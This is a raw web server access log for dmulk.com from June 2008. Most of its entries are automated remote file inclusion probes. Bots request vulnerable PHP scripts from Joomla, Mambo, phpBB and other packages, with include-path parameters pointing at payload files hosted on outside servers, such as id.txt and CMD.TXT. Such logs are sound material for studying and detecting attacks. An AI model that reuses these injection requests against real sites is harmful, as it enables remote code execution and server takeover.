75.68.16.126 - - [09/Jun/2008:09:38:55 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
75.68.16.126 - - [09/Jun/2008:09:38:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
207.58.163.166 - - [09/Jun/2008:09:39:14 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.142.215.151 - - [09/Jun/2008:09:39:16 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.58.163.166 - - [09/Jun/2008:09:39:17 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:39:31 -0700] "GET /logs/access_080215.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:39:35 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:39:35 -0700] "GET /logs//components/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:39:51 -0700] "GET /logs/access_080201.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:09:40:11 -0700] "GET /index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 200 16871 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:09:40:11 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:40:12 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:40:24 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:09:40:25 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:40:40 -0700] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:40:40 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:40:40 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:40:41 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:40:46 -0700] "GET /logs/access_080117.log/modules/xfsection/modify.php?dir_module=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:40:49 -0700] "GET /logs/access_080117.log/modules/xfsection/modify.php?dir_module=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:40:56 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:40:56 -0700] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:40:56 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:40:56 -0700] "GET /logs/access_080316.log/index2.php?DoAction=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:40:56 -0700] "GET /index2.php?DoAction=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:40:56 -0700] "GET /logs/index2.php?DoAction=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:40:58 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:41:09 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0039.jpg HTTP/1.1" 200 10574 "-" "Googlebot-Image/1.0" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:41:20 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:41:22 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:41:25 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0018.jpg HTTP/1.1" 200 8659 "-" "Googlebot-Image/1.0" "dmulk.com"
201.122.36.7 - - [09/Jun/2008:09:41:29 -0700] "GET /logs/access_080216.log/newspublish/include.php?path[docroot]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.122.36.7 - - [09/Jun/2008:09:41:29 -0700] "GET /newspublish/include.php?path[docroot]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.122.36.7 - - [09/Jun/2008:09:41:29 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:41:52 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:09:41:56 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:09:41:57 -0700] "GET /logs/access_080330.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.17.20.250 - - [09/Jun/2008:09:41:57 -0700] "GET /logs/db.php?path_local=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:09:41:57 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.17.20.250 - - [09/Jun/2008:09:41:57 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:09:41:57 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.17.20.250 - - [09/Jun/2008:09:41:58 -0700] "GET /db.php?path_local=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:09:41:58 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.18.104.114 - - [09/Jun/2008:09:41:58 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:09:41:58 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:41:59 -0700] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:42:00 -0700] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.142.40 - - [09/Jun/2008:09:42:09 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.34.78.106 - - [09/Jun/2008:09:42:16 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [09/Jun/2008:09:42:16 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:42:30 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [09/Jun/2008:09:42:32 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:43:13 -0700] "GET /logs/access_080103.log/modules/xfsection/modify.php?dir_module=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:43:14 -0700] "GET /logs/access_080103.log/modules/xfsection/modify.php?dir_module=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:44:10 -0700] "GET /logs/access_071225.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:44:11 -0700] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:44:11 -0700] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:09:44:15 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:09:44:15 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:44:42 -0700] "GET /logs/access_080413.log/index2.php?showpage=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:44:42 -0700] "GET /index2.php?showpage=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:44:42 -0700] "GET /logs/index2.php?showpage=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:44:42 -0700] "GET /logs/access_080426.log/index2.php?showpage=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.134.83 - - [09/Jun/2008:09:44:45 -0700] "GET /logs/access.log/index1.php?dat=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [09/Jun/2008:09:44:50 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [09/Jun/2008:09:44:55 -0700] "GET /index1.php?dat=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:44:56 -0700] "GET /logs/access_080118.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.134.83 - - [09/Jun/2008:09:44:59 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [09/Jun/2008:09:45:04 -0700] "GET /logs/index1.php?dat=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:09:45:07 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:09:45:07 -0700] "GET /logs/access_080308.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [09/Jun/2008:09:45:08 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:45:33 -0700] "GET /logs/access_080125.log/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:45:33 -0700] "GET /errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:45:33 -0700] "GET /logs/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:45:47 -0700] "GET /logs/access_080217.log/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.186 - - [09/Jun/2008:09:45:52 -0700] "GET /logs/access_080215.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:46:05 -0700] "GET /logs/access_080429.log/administrator/components/com_extcalendar/admin.extcalendar.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.18.104.114 - - [09/Jun/2008:09:46:13 -0700] "GET /logs/access.log/db.php?path_local=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.17.20.250 - - [09/Jun/2008:09:46:14 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.17.20.250 - - [09/Jun/2008:09:46:14 -0700] "GET /db.php?path_local=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.18.104.114 - - [09/Jun/2008:09:46:14 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.18.104.114 - - [09/Jun/2008:09:46:15 -0700] "GET /logs/db.php?path_local=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.18.104.114 - - [09/Jun/2008:09:46:15 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.195.40.3 - - [09/Jun/2008:09:46:35 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:46:36 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:46:36 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.122.36.7 - - [09/Jun/2008:09:46:39 -0700] "GET /logs/access_080223.log/newspublish/include.php?path[docroot]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:47:15 -0700] "GET /logs/access.log/errors.php?error=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:47:16 -0700] "GET /errors.php?error=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:47:19 -0700] "GET /logs/access_080126.log/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:47:19 -0700] "GET /errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
72.47.213.57 - - [09/Jun/2008:09:47:19 -0700] "GET /logs/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
69.72.208.186 - - [09/Jun/2008:09:47:34 -0700] "GET /index.php?x=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 200 16861 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:47:39 -0700] "GET /logs/access.log/errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:47:40 -0700] "GET /errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:47:40 -0700] "GET /logs/errors.php?error=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:47:58 -0700] "GET /logs/access_080209.log/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:48:06 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.12.149.44 - - [09/Jun/2008:09:48:12 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.149.44 - - [09/Jun/2008:09:48:13 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.17.20.250 - - [09/Jun/2008:09:48:59 -0700] "GET /logs/access_080225.log/db.php?path_local=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.18.104.114 - - [09/Jun/2008:09:49:00 -0700] "GET /logs/access_080225.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.65.79 - - [09/Jun/2008:09:49:27 -0700] "GET /errors.php?error=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
212.227.65.79 - - [09/Jun/2008:09:49:27 -0700] "GET /logs/errors.php?error=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.195.40.3 - - [09/Jun/2008:09:49:29 -0700] "GET ////common/db.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:51:18 -0700] "GET /logs/access_080113.log/login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:51:19 -0700] "GET /login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:51:19 -0700] "GET /logs/login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:51:29 -0700] "GET /logs/access_080126.log/login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:51:29 -0700] "GET /login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:51:30 -0700] "GET /logs/login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.6.17.154 - - [09/Jun/2008:09:51:42 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/trackback/ HTTP/1.0" 200 11509 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
203.72.181.15 - - [09/Jun/2008:09:51:49 -0700] "GET /logs/access_080106.log/administrator/components/com_extcalendar/admin.extcalendar.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:09:52:49 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:09:52:49 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:09:52:49 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
